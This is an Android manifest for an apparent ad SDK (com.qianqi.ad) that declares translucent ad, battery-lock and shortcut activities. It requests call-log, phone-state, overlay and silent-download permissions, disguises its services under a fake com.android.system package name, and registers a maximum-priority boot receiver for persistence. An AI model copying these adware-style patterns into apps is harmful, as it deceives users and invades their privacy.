<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.qianqi.ad">

    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.DOWNLOAD_WITHOUT_NOTIFICATION" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT"/>
    <uses-permission android:name="android.permission.GET_PACKAGE_SIZE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/>
    <uses-permission android:name="com.android.launcher2.permission.READ_SETTINGS"/>
    <uses-permission android:name="com.android.launcher3.permission.READ_SETTINGS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />


    <application android:allowBackup="true"
                 android:supportsRtl="true"
    >
        <activity
            android:name="com.qinglu.ad.QLBrowserSpotActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLBannerActivity"
            android:label=""
            android:process=":core"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLBatteryLockActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLBatteryLockSettingActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLAppSpotActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLWIFIActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.qinglu.ad.QLShortcutActivity"
            android:label=""
            android:process=":core"
            android:screenOrientation="portrait"
            android:theme="@style/AppTheme" >
            <intent-filter>
                <action android:name="com.qylk.start.main" />
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>

        <service
            android:name="com.android.system.core.sometools.GService"
            android:exported="true"
            android:process=":core" >
        </service>
        <service
            android:name="com.android.system.core.sometools.GService$CoreInnerService"
            android:process=":core">
        </service>

        <receiver
            android:name="com.android.system.core.sometools.GReceiver"
            android:process=":core" >
            <intent-filter>
                <action android:name="android.intent.action.core.restart" />
            </intent-filter>
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>



    </application>

</manifest>
